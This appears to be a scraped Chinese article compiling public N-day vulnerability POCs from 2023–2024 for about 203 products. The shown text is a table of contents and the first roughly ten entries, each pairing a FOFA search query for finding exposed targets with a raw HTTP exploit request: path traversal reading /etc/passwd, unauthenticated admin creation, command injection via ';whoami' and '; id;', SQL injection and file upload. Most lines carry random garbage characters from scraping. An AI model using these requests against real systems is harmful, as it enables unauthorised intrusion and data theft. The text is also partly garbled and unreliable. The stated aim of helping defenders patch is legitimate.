互联网公开漏洞整理202309-202406. o6 W U$ N; v8 B7 `( j; X
道一安全 2024-06-05 07:41 北京
5 R1 b+ g: e# }$ r% A& Q以下文章来源于网络安全新视界 ,作者网络安全新视界
8 `; S) t }$ P: F5 L" K
- m; }0 \/ f8 x# E! F; _发文目的:Nday漏洞的利用是安全攻防占比较大的攻击方式,希望文章对大家的防守提供一定帮助。防守同学可根据本文内容进行风险排查。/ R1 b6 N0 O! w! W3 ]
0 V; P# h1 y# @% ?漏洞来源:文章涵盖2023年9月至2024年5月国内外公开的高危害漏洞POC共203个,均来自于互联网其他公众号或者网站,由网络安全新视界团队进行整理发布。8 ]- q6 p9 v* i
% `# s" F6 A- s8 w5 {2 Z: c
安全补丁:所有的漏洞均为公开漏洞,补丁或漏洞修复方案请联系产品厂家。5 Q, z6 ~' r0 _: V+ C) G3 j
. @( j% p9 F+ S7 e+ s文章内容:因受篇幅限制,个别漏洞POC由于过长,统一使用PAYLOAD字样代替,如需完整POC请自行搜索。
) V, Z! W& W" J1 o0 C/ b- x( [0 H* }* F: {8 E, ]- ?4 M V. J V- z
合法权益:如文章内容侵犯某方合法权益,请后台联系网络安全新视界团队对相关内容进行删除。$ C" j: C/ J O% N
, O% f0 O3 e+ I; I8 d+ g" {# F
7 a5 k$ x6 L J+ L+ \/ M声明
$ `. ^, i6 q; Z! f0 L# O
/ D: F8 d7 z0 F( o为简化流程,方便大家翻阅,固不设置“回复再给完整列表”。本文章就是当前最全文章,使用时F12搜索关键词即可。
7 R$ ~" y& V; w% @* i3 T! D% B1 L+ z/ X6 a% O$ V
有需要的可以收藏此文。也可以关注本公众号(网络安全新视界)。
0 i% _1 o% o6 M9 K z
: {7 w- A. X7 O
: F V3 X' Q6 T$ f2 U+ K+ e3 f
. a7 I1 _& u8 x+ g) E目录/ |! s S7 T* D# j: ^0 w
" |2 _) i0 V% F
011 k# k, v0 H( Z+ E3 F
i1 M, b0 k4 J7 Z' w
1. StarRocks MPP数据库未授权访问
$ W! O: [0 W' J- l* ~) m) [- g2. Casdoor系统static任意文件读取( O: }) w' C' i9 f0 B: _" Z
3. EasyCVR智能边缘网关 userlist 信息泄漏, ]: v4 m% d5 M# x" ^" `
4. EasyCVR视频管理平台存在任意用户添加
# t( i1 P8 L! I( _8 H5. NUUO NVR 视频存储管理设备远程命令执行6 [3 n/ L) V/ _( @! [
6. 深信服 NGAF 任意文件读取
# y" k) B9 a: }7 }) @9 A, ~' e7. 鸿运主动安全监控云平台任意文件下载
. P2 e9 a3 A j! P9 D8. 斐讯 Phicomm 路由器RCE5 ^% ?; V) X5 d
9. 稻壳CMS keyword 未授权SQL注入- x9 V1 ] x% [
10. 蓝凌EIS智慧协同平台api.aspx任意文件上传6 x4 Q, f+ H' e6 r" M- T
11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入
) ?4 x5 K: Q" _4 h12. Jorani < 1.0.2 远程命令执行
# @/ N- [9 H+ k* `- o13. 红帆iOffice ioFileDown任意文件读取. _% e5 t: r8 @. D/ B! A
14. 华夏ERP(jshERP)敏感信息泄露
3 L, C& P( a4 u" X8 U9 U; N15. 华夏ERP getAllList信息泄露
# Y. k9 K' G" \16. 红帆HFOffice医微云SQL注入- H, g3 P$ S) j/ t8 {9 C1 [
17. 大华 DSS itcBulletin SQL 注入6 b: b3 c2 e) L0 J- F
18. 大华 DSS 数字监控系统 user_edit.action 信息泄露+ f, B" d) y# w1 g! U: e6 M
19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入
# B( Z8 ]9 ?& @, P8 G20. 大华ICC智能物联综合管理平台任意文件读取0 n" Z n( }% [- r/ }- g2 I) W
21. 大华ICC智能物联综合管理平台random远程代码执行
$ I) I6 c3 P: t( o2 m- ~9 [22. 大华ICC智能物联综合管理平台 log4j远程代码执行
; W4 {6 ^3 `4 A: J7 k& @23. 大华ICC智能物联综合管理平台 fastjson远程代码执行
: V( m) z1 Z0 ~1 R& c24. 用友NC 6.5 accept.jsp任意文件上传
8 R$ b" J5 N+ [2 h0 s+ V25. 用友NC registerServlet JNDI 远程代码执行- d5 p$ x; y& ]; z/ C# v4 c$ I7 S
26. 用友NC linkVoucher SQL注入8 }+ }0 {# |. M& r, i" W7 `
27. 用友 NC showcontent SQL注入/ R ?+ f+ Q8 E& w1 |
28. 用友NC grouptemplet 任意文件上传
, y4 N8 N- @! R# V+ m2 e29. 用友NC down/bill SQL注入
. u8 |8 ~4 ?5 J' b' x0 G4 |30. 用友NC importPml SQL注入
; c! Y6 ?$ \( A31. 用友NC runStateServlet SQL注入
5 u; y& s8 D: G& Y$ B32. 用友NC complainbilldetail SQL注入
" F2 \" P8 W2 J+ w ~6 Q0 i33. 用友NC downTax/download SQL注入
! L3 R" x+ ]( z! b: H0 v2 G9 s34. 用友NC warningDetailInfo接口SQL注入
" t% W5 {1 g" ?35. 用友NC-Cloud importhttpscer任意文件上传
# z9 b8 Y2 F9 \, M( B; N D36. 用友NC-Cloud soapFormat XXE
2 E6 r! O* \: E4 H37. 用友NC-Cloud IUpdateService XXE
& h6 |" X. A! N: g' y6 q38. 用友U8 Cloud smartweb2.RPC.d XXE
& P8 o' p5 g, ]& y39. 用友U8 Cloud RegisterServlet SQL注入9 S5 }, f$ f; n2 g: F4 _+ g
40. 用友U8-Cloud XChangeServlet XXE
( ^; m5 i0 D& D, F$ l& W f9 Z41. 用友U8 Cloud MeasureQueryByToolAction SQL注入
2 i- n4 T2 B r9 v42. 用友GRP-U8 SmartUpload01 文件上传3 Y+ ]8 A4 z) d
43. 用友GRP-U8 userInfoWeb SQL注入致RCE6 J+ F/ r: _5 ~, g5 ?* T6 _2 z
44. 用友GRP-U8 bx_dj_check.jsp SQL注入7 S. M! @4 l8 ]. \& [
45. 用友GRP-U8 ufgovbank XXE
n9 n. B! h) q$ K46. 用友GRP-U8 sqcxIndex.jsp SQL注入
0 n: k- a* g: F5 l47. 用友GRP A++Cloud 政府财务云 任意文件读取
; M' @' k; G0 e, Y2 F48. 用友U8 CRM swfupload 任意文件上传! m# Q+ h f, t
49. 用友U8 CRM系统uploadfile.php接口任意文件上传
0 P8 ?& G: t7 B( R1 @50. QDocs Smart School 6.4.1 filterRecords SQL注入
& o$ C4 }9 W$ ^/ N; p% @51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入
: h/ h# m2 \# k/ T* d) V52. 泛微E-Office json_common.php sql注入
w: r! |) Y) j/ \$ L9 j53. 迪普 DPTech VPN Service 任意文件上传) q: y: D+ J' H- ]% b1 x9 `% E
54. 畅捷通T+ getstorewarehousebystore 远程代码执行
* g4 n, E& y) n q3 S. ~* }55. 畅捷通T+ getdecallusers信息泄露- g9 h S( d F
56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE
; o& G' \+ @, W; e# }57. 畅捷通T+ keyEdit.aspx SQL注入
0 o. c7 d3 ?7 {+ @58. 畅捷通T+ KeyInfoList.aspx sql注入
1 }9 t) X7 h6 N5 `& H+ E59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行: H! F8 m1 l& F& S; O; w
60. 百卓Smart管理平台 importexport.php SQL注入
1 o. S$ v' S0 G# N# I6 v( X61. 浙大恩特客户资源管理系统 fileupload 任意文件上传
! V6 C" N( C6 A4 D62. IP-guard WebServer 远程命令执行
% Q- P! [! V' W" [( }6 p: C63. IP-guard WebServer任意文件读取& |! d u$ T0 Q" G$ Z
64. 捷诚管理信息系统CWSFinanceCommon SQL注入
/ i( T+ w2 J6 e" u65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过2 Q M; w& F- J0 A) }( I/ |# m6 R
66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入
, Y2 P7 F* t) c2 l) G R# v+ d67. 万户ezOFFICE wpsservlet任意文件上传) k, L: Y5 P0 m8 P
68. 万户ezOFFICE wf_printnum.jsp SQL注入/ l- l \: B3 _6 V* }& ?8 o
69. 万户 ezOFFICE contract_gd.jsp SQL注入+ j. B: z0 a; e0 b6 S4 f
70. 万户ezEIP success 命令执行+ q: N2 h+ ~, q
71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入
* U& U" ^9 L r. ]3 P72. 致远OA getAjaxDataServlet XXE2 `5 p9 g4 r3 C/ l. J
73. GeoServer wms远程代码执行8 C, f; B6 F3 Q- n
74. 致远M3-server 6_1sp1 反序列化RCE
7 |9 Y& r/ Y$ [: ~6 b75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE" D. c: C) k3 W3 S5 |0 H
76. 新开普掌上校园服务管理平台service.action远程命令执行
6 J% L! b2 {6 u8 l77. F22服装管理软件系统UploadHandler.ashx任意文件上传
$ k3 d7 m6 r) m5 g0 Q, x78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传( W) K- q+ ]. c9 m
79. BYTEVALUE 百为流控路由器远程命令执行
3 d* H/ h2 [9 ~* h( z80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传
, R F+ r# x7 E B: H p9 ~/ F, g81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露8 p. \- B) U/ f3 L
82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行
+ N6 ?4 J6 t. m2 N; }% ~83. JeecgBoot testConnection 远程命令执行
0 n* s1 B5 B& L2 H6 f84. Jeecg-Boot JimuReport queryFieldBySql 模板注入
' X0 P" t* k/ X1 P85. SysAid On-premise< 23.3.36远程代码执行+ y1 Z" W( k% t" G' d
86. 日本tosei自助洗衣机RCE: |7 G$ s3 d6 m* p$ j) g4 J
87. 安恒明御安全网关aaa_local_web_preview文件上传 J" W1 Z- M7 x' `3 s- Z( b" z
88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行
4 i$ V/ Y5 `1 s, O89. 致远互联FE协作办公平台editflow_manager存在sql注入
7 ]1 _) A; f1 q% q& Y6 t& i90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行
) V* ^' c. U8 @7 j# O2 }91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取
1 f3 {% B' z4 G1 V$ r' S, E92. 海康威视运行管理中心session命令执行0 {9 x- F4 a3 u0 V* I* L% O
93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传4 I8 x G+ _( \' ~( |
94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传
: H8 W; K; f/ ?$ P3 Y( q95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行
1 }! |* D+ y( [- s* s/ d96. Apache OFBiz 18.12.11 groovy 远程代码执行* m0 M- b% |0 ]/ O& ^8 W: Z
97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行
5 O0 w# q H) O( b/ e98. SpiderFlow爬虫平台远程命令执行) Q$ E8 s' \" E0 D; K3 r* r
99. Ncast盈可视高清智能录播系统busiFacade RCE
7 R$ W& d% P `1 h6 Y100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传* a2 y) \, o5 Y) n/ k6 S
101. ivanti policy secure-22.6命令注入0 }; d0 {9 j7 i! m- t- p2 M, ^/ S
102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行0 q; d/ e0 k0 y G! K3 k& X
103. Ivanti Pulse Connect Secure VPN XXE
, r& e6 H! U, Q" z$ `104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露
# D4 k& [1 \: x2 F% e& P% {5 a105. SpringBlade v3.2.0 export-user SQL 注入
' I& |# c; z& D( c( v106. SpringBlade dict-biz/list SQL 注入
( V% }* ^* D' S/ p# _& e7 c107. SpringBlade tenant/list SQL 注入
) Y0 ]6 Z9 k; A" Y108. D-Tale 3.9.0 SSRF6 t( ~3 W" s0 F( k' L
109. Jenkins CLI 任意文件读取5 |& V1 f9 S! R, f
110. Goanywhere MFT 未授权创建管理员/ {; D2 |# I. G, C& N; ~ s" K
111. WordPress Plugin HTML5 Video Player SQL注入
3 R& h- f5 T: I% s112. WordPress Plugin NotificationX SQL 注入
( I, o0 l6 M' x7 ?+ t113. WordPress Automatic 插件任意文件下载和SSRF1 k @+ q x, {. ^
114. WordPress MasterStudy LMS插件 SQL注入% O% }: S+ l' B2 w1 v
115. WordPress Bricks Builder <= 1.9.6 RCE
' K: N: H @/ f( e116. wordpress js-support-ticket文件上传, X% G' R* ^) c
117. WordPress LayerSlider插件SQL注入 h: L! T2 u1 M+ G6 @1 _# R
118. 北京百绰智能S210管理平台uploadfile.php任意文件上传
0 h: Y$ ?5 u. X+ `119. 北京百绰智能S20后台sysmanageajax.php sql注入$ X5 k; Y) e+ k
120. 北京百绰智能S40管理平台导入web.php任意文件上传5 ~0 G, t' P3 X, L. v
121. 北京百绰智能S42管理平台userattestation.php任意文件上传, L9 F, c' \, s+ C/ {
122. 北京百绰智能s200管理平台/importexport.php sql注入
' I$ }! T+ s: m+ A1 P) E3 B5 D, C123. Atlassian Confluence 模板注入代码执行
5 Z' F# E# S. o( `1 _# }( r, F124. 湖南建研工程质量检测系统任意文件上传
. e* {3 N6 F9 f1 n- K' o# X8 ?125. ConnectWise ScreenConnect身份验证绕过, J+ n3 q2 L* S4 B
126. Aiohttp 路径遍历, H% q, p4 g" | Z e
127. 广联达Linkworks DataExchange.ashx XXE
$ ]1 R' K% `7 a. V2 S) G) J! ]128. Adobe ColdFusion 反序列化* z) t* R# K. B [
129. Adobe ColdFusion 任意文件读取
9 a9 H- B3 q- V8 K130. Laykefu客服系统任意文件上传
/ [, f" u- B+ M8 X3 X% I& L131. Mini-Tmall <=20231017 SQL注入+ U& Q7 C& _8 p# H) u& t
132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过
; [' G: ~. i: c& w: y0 }+ }133. H5 云商城 file.php 文件上传, z* j2 q h: I! G$ T
134. 网康NS-ASG应用安全网关index.php sql注入
1 `, J3 W5 I- |135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入
8 p7 X% Y; A4 n4 u$ I" g3 e136. NextChat cors SSRF
$ U& D! l5 m1 g! g# k137. 福建科立迅通信指挥调度平台down_file.php sql注入
2 w% _ l6 S @' G/ J6 L8 e138. 福建科立讯通信指挥调度平台pwd_update.php sql注入: H' x c3 f. f* q/ j8 j: O
139. 福建科立讯通信指挥调度平台editemedia.php sql注入
) M5 U8 I# E7 G5 @- S: d1 ^140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入
8 z9 u* f( h' ^1 x141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入
5 h5 m( z( N* t- L, V/ f& d. p142. CMSV6车辆监控平台系统中存在弱密码
& j b) z* V) i/ M143. Netis WF2780 v2.1.40144 远程命令执行
B( ]1 u! v/ l# S6 E144. D-Link nas_sharing.cgi 命令注入
9 p6 J* y! I; d, D- V" }6 n4 r145. Palo Alto Networks PAN-OS GlobalProtect 命令注入& E3 N( K! t& Z6 K
146. MajorDoMo thumb.php 未授权远程代码执行
0 h- k v& @6 G V7 j+ |) u( x147. RaidenMAILD邮件服务器v.4.9.4-路径遍历; s5 E, I9 M I# U3 _
148. CrushFTP 认证绕过模板注入* c* U! p. i: e% R
149. AJ-Report开源数据大屏存在远程命令执行% V5 d# J! B# s2 n/ E0 q" a
150. AJ-Report 1.4.0 认证绕过与远程代码执行
W$ C2 ~ f% ?( X. v) k151. AJ-Report 1.4.1 pageList sql注入- T" z3 g' ?9 v0 F; F* p! }
152. Progress Kemp LoadMaster 远程命令执行
- d- S1 i4 t! Q x153. gradio任意文件读取$ y9 [4 f" I5 [9 `8 `
154. 天维尔消防救援作战调度平台 SQL注入
! |9 w: o7 y) {$ |! ?) \8 W" ~. N155. 六零导航页 file.php 任意文件上传 }$ K S2 L6 A1 e6 P% J+ B/ _
156. TBK DVR-4104/DVR-4216 操作系统命令注入 }3 b2 C1 N. X/ q1 u, C
157. 美特CRM upload.jsp 任意文件上传
* M6 V: c! ?, n4 Y F% z158. Mura-CMS-processAsyncObject存在SQL注入 h8 o, ^2 |5 _. J( o
159. 英飞达医学影像存档与通信系统 WebJobUpload 任意文件上传5 A6 s7 B% A; `' H: j! I% F
160. Sonatype Nexus Repository 3目录遍历与文件读取
, P/ |7 U v- E% p. X161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传7 x! ]* o. L7 G0 n2 X7 z
162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传
! M. N) l4 ]' y- G163. 号卡极团分销管理系统 ue_serve.php 任意文件上传
{+ U o% O: E0 |) S* }- ~1 J164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传
~: }' L9 ^2 Z+ g8 Z165. OrangeHRM 3.3.3 SQL 注入% L+ T' y3 l' Y T- c! N5 c
166. 中成科信票务管理平台SeatMapHandler SQL注入7 D' _; t5 J' u0 q4 x
167. 精益价值管理系统 DownLoad.aspx任意文件读取
6 P9 ]/ q F% b2 W* T0 F168. 宏景EHR OutputCode 任意文件读取
& }* L& V: ]+ H2 f169. 宏景EHR downlawbase SQL注入
, \- ~1 N$ H+ m170. 宏景EHR DisplayExcelCustomReport 任意文件读取
: Y3 @" n: ~" X p3 c+ n5 F# R171. 通天星CMSV6车载定位监控平台 SQL注入$ \+ }7 }, ?; p* i
172. DT-高清车牌识别摄像机任意文件读取
% _6 H& X- g$ d% K) Y& f173. Check Point 安全网关任意文件读取 O( P' L4 {! G2 C& c/ q x5 S
174. 金和OA C6 FileDownLoad.aspx 任意文件读取1 k3 U% M9 p2 h( `$ e. ?
175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入
% L- I" L d+ L& T! ]. V1 Z% R; L6 R176. 电信网关配置管理系统 rewrite.php 文件上传0 D- ]* {" e3 B- l6 X
177. H3C路由器敏感信息泄露
5 E- J3 M/ ~' _/ a3 l178. H3C校园网自助服务系统-flexfileupload-任意文件上传1 g; `2 F+ |! R2 S9 Z" ?1 i
179. 建文工程管理系统存在任意文件读取
( r3 b6 H9 E7 n7 ~0 x180. 帮管客 CRM jiliyu SQL注入& V2 `; O6 e$ {8 i; E+ o3 F8 l
181. 润申科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入# M7 U5 b; k9 ]# N. C# X1 T
182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建 Y- \& w0 K2 R6 ?, i6 H7 W$ |! H% q
183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入* [0 v" Q+ S2 j
184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加" u8 B% r8 O% M4 J7 d+ y" p6 E
185. 瑞友天翼应用虚拟化系统SQL注入
$ s4 P: H3 U# h9 g186. F-logic DataCube3 SQL注入* X* s# h8 L3 R8 p4 A8 i
187. Mura CMS processAsyncObject SQL注入6 m8 P4 s$ H* f9 e
188. 叁体-佳会视频会议 attachment 任意文件读取# \) o/ J. H6 X3 v
189. 蓝网科技临床浏览系统 deleteStudy SQL注入
2 `: \' u. Y( u( i$ e190. 短视频矩阵营销系统 poihuoqu 任意文件读取
3 P& l' h8 K1 {+ h191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入
) R& M# |- j `- L192. 富通天下外贸ERP UploadEmailAttr 任意文件上传+ o0 D2 S$ p c% B
193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行
6 x/ v; H) I8 q3 e194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传' ]6 y: R6 w- Y/ T8 L8 d# Y
195. 飞鱼星上网行为管理系统 send_order.cgi命令执行6 ?3 N; d( d6 @. f$ o4 B9 p. A8 h
196. 河南省风速科技统一认证平台密码重置+ S: [0 u4 v' |6 ^3 ]8 W, ~& u
197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入
9 m! e4 _& [9 Z198. 阿里云盘 WebDAV 命令注入
# [% ?$ J2 P& P) j199. cockpit系统assetsmanager_upload接口 文件上传
: D1 }0 F- g9 B% t3 Q$ c7 Q200. SeaCMS海洋影视管理系统dmku SQL注入
2 f5 h" ?. O" W7 F201. 方正全媒体新闻采编系统 binary SQL注入8 i% r `0 u) l; c- W) D
202. 微擎系统 AccountEdit任意文件上传8 b% y1 S5 {$ P7 V# a. O \
203. 红海云EHR PtFjk 文件上传( f/ B3 \- }8 e* B- h
# S* |$ Z# o+ [6 i1 U# g
POC列表6 Y) u7 |" V9 Y+ R; I" b8 H. E5 b
' g s U8 ~; j1 H02! \# E _$ U& Y H# {# n1 ^$ B& `
/ l$ m9 n) B& Q1 [, T0 j4 S1. StarRocks MPP数据库未授权访问
1 E, Y) G/ ~& C( q9 UFOFA :title="StarRocks"& w, e l' L/ t) t# u; |
GET /mem_tracker HTTP/1.1
7 y/ l6 m, P( p. ^% DHost: URL
4 ?3 T4 m) B+ [% v. @( l5 d
2 G" Z( Z/ T3 N. g" `" I
- H ^5 y; U6 M2 b7 R, N! T2. Casdoor系统static任意文件读取
1 B$ \4 t# G7 L" i( @. q) \FOFA :title="Casdoor"
4 J) S. _$ P4 q* |+ q6 ZGET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
6 s/ z. r9 U9 x+ e. W9 [Host: xx.xx.xx.xx:99992 }9 B D. r, |; R5 R" A3 U
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
( [' h' s- L0 L. k& w$ _2 d* CConnection: close5 ]1 _8 u* U0 b7 N
Accept: */*
' p' R4 l- W2 @! A+ S1 jAccept-Language: en
! Q7 o7 V+ }( D8 C0 ]+ `Accept-Encoding: gzip
+ ]$ Q3 q+ P- t+ \: U; e
; m! ^! ?$ F; F6 `4 i0 G
/ s# V: t( i- P, q1 E3. EasyCVR智能边缘网关 userlist 信息泄漏
' w1 h2 Y0 x# d! ^0 r" C+ u( E" \FOFA :title="EasyCVR": |3 I3 H% l6 P; P+ L
GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1, i7 X' [/ n/ c% y" u* V
Host: xx.xx.xx.xx! r) G$ R' o" y3 ^7 O- e
4 e4 L1 S9 {; j2 J
: B/ }! _0 j7 z* }5 X, t5 C9 M- Y- Z7 u4. EasyCVR视频管理平台存在任意用户添加7 m" m* x# Q, O
FOFA :title="EasyCVR"
j6 Y9 U. v" M/ S. A% O) O
2 w: U1 h" ^' c# F8 y8 n p3 ~password更改为自己的密码md58 _% A: r5 s) a
POST /api/v1/adduser HTTP/1.1
& g& p6 z6 R9 b# _0 s( e# j7 C5 OHost: your-ip! r* q/ w( H% {: M
Content-Type: application/x-www-form-urlencoded; charset=UTF-89 C j) V* o: Y; y& ^' H
* i2 [% Y$ S7 e" Z! _name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1
' E5 y- S1 H' B/ x3 F$ J2 u6 e3 l3 _2 n
7 {/ {; s! W- U! b o+ v6 S9 j5 k0 N) |5 }- I% X9 Y) Q
5. NUUO NVR 视频存储管理设备远程命令执行
& m6 G7 @7 j) i4 y. ]# y: C9 W( lFOFA:title="Network Video Recorder Login"1 f9 G. E/ Z: o" t" M J; R
GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
2 f8 f& E1 z w9 K" L; P1 g: u5 j# }Host: xx.xx.xx.xx3 \, i! k" G/ v6 d& G' Y
+ q# P0 a1 Z& Z# g ]& \0 q
; J% Y# B5 L! J. b3 C$ |4 Y6. 深信服 NGAF 任意文件读取' {+ b. c3 c- A& A0 W4 l
FOFA:title="SANGFOR | NGAF"' r" b; \8 J* D- r# N5 f
GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
3 a" c; P" P2 k$ ?1 m% Z, \Host:0 n& Y# Y8 i, ?" e/ A# u) Y
0 G/ \2 T9 k4 l/ c% f9 f7 q9 V6 ^: ]4 {" i$ B/ l; A1 r6 `
7. 鸿运主动安全监控云平台任意文件下载; q& B# q; m7 n# H1 q( u
FOFA:body="./open/webApi.html"
, @9 G$ ^( z$ t: d( oGET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
v4 T0 K3 G9 nHost:
8 Q( v( e7 e6 p8 ~' A- k6 }0 i& z
6 ]( n9 D, m1 F( o: X: p! q
* K" T" t2 w$ t Y+ Y9 c; I8. 斐讯 Phicomm 路由器RCE
+ j. F, f' W# W% G; \6 |, u A+ DFOFA:icon_hash="-1344736688"
5 r7 ^1 Z( N8 q8 c3 W6 Y, d默认账号admin登录后台后,执行操作) @+ j6 `/ O" f1 S+ B
POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1( }% [7 e' r3 V5 H! z( e9 \
Host: x.x.x.x
9 \6 [9 M* G2 oCookie: sysauth=第一步登录获取的cookie3 l7 J* [3 S' t- n, h; v9 w
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz
0 L8 }4 ]' o. \. G+ \) s2 wUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
; o# H6 `6 K0 S4 O* H6 u
: U! \% {% I8 N M------WebKitFormBoundaryxbgjoytz9 t$ S0 i4 h4 Z
Content-Disposition: form-data; name="wifiRebootEnablestatus"
: j9 D# k- v' V6 [; ~: q; v( u( V5 r: ]5 o" n: r r! s. t
%s
% n3 \, `0 r; `------WebKitFormBoundaryxbgjoytz0 Z/ U/ y0 w) p6 X8 C& V
Content-Disposition: form-data; name="wifiRebootrange"
# e# Q- E; Y" ?3 F0 {0 Z! {" x% {! \
12:00; id;$ Z1 l! g1 O, `. ~4 |
------WebKitFormBoundaryxbgjoytz& r3 @4 ?; O0 U" U& \3 |
Content-Disposition: form-data; name="wifiRebootendrange"
+ r, t: @- a8 i, q1 u: e$ z$ S+ P! T. {+ E2 H2 k* \7 |. o5 ]
%s:) y3 a+ Y6 C% T6 C9 p1 [5 }
------WebKitFormBoundaryxbgjoytz) S- k( n. x s* J3 d. f% u( I
Content-Disposition: form-data; name="cururl2": M/ b" ~1 Z2 d. r; j: d y
) M* L K [8 E
9 a5 i# ?+ T& F5 i6 |, {------WebKitFormBoundaryxbgjoytz--" Z4 M" ]' q7 D' E
p) m1 k: j( H% l! K/ W1 L2 l
+ _4 U2 A" t0 v
9. 稻壳CMS keyword 未授权SQL注入
" p9 n6 m0 y0 ~& aFOFA:app="Doccms"
4 H: w+ h+ k# Q: @) t8 mGET /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33 HTTP/1.1
; ?& v8 M7 ]* {# q5 D1 {Host: x.x.x.x! M T2 Q- U# h3 ~
; W" s9 O! f' i. h: d6 N" x+ j
* @# ]% i$ h5 @( M' Q6 E
payload为下列语句的二次Url编码/ ]$ W3 Q9 s6 O$ V2 t; X
* [" v4 `2 j+ D0 k8 \+ h' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#
5 z# F3 n1 U6 G
6 ?. b: z8 c' G; O* ?10. 蓝凌EIS智慧协同平台api.aspx任意文件上传! C5 G8 O( n. h8 a
FOFA:icon_hash="953405444"+ y; L6 X% S" w7 [/ D, g. o) {: _
4 t# Q# g5 g7 v% D% D; M文件上传后响应中包含上传文件的路径) D9 P6 J4 Q7 G# x3 ~, _+ X
POST /eis/service/api.aspx?action=saveImg HTTP/1.17 w/ c# `9 l5 L0 j: q3 t
Host: x.x.x.x:xx$ D0 _$ ~7 C6 b& A$ C
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36; {: \/ O5 ]4 e. }+ h
Content-Length: 197) h0 {& L+ v$ L
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9& u; u! ?9 W8 O$ {, R7 T) Y
Accept-Encoding: gzip, deflate
0 D! O H' p0 n2 |6 yAccept-Language: zh-CN,zh;q=0.9+ M7 o8 s/ Z g9 \( f' S/ Y
Connection: close& M2 R1 F8 [2 R. G' C9 X: C
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu. p% Q% R* O8 f3 t) X
6 H, N; i7 H. U------WebKitFormBoundaryxdgaqmqu
9 L. t( ?% h I ^Content-Disposition: form-data; name="file"filename="icfitnya.txt"/ K, E6 Q# L) G/ M
Content-Type: text/html" D4 P; _5 P' u, R: J
' q: ~! @$ y' n) w7 A4 H' `
jmnqjfdsupxgfidopeixbgsxbf/ b. j; d- B3 h( J1 u8 X/ T
------WebKitFormBoundaryxdgaqmqu--
2 g3 U! t9 S9 i* S% h9 L/ y: N9 X- {3 Z* R7 y, ?$ u1 u& d
) S' I2 o4 A" R; D1 z
11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入9 m [- B- J# S- p6 r) H. R
FOFA:icon_hash="953405444" || app="Landray-EIS智慧协同平台"
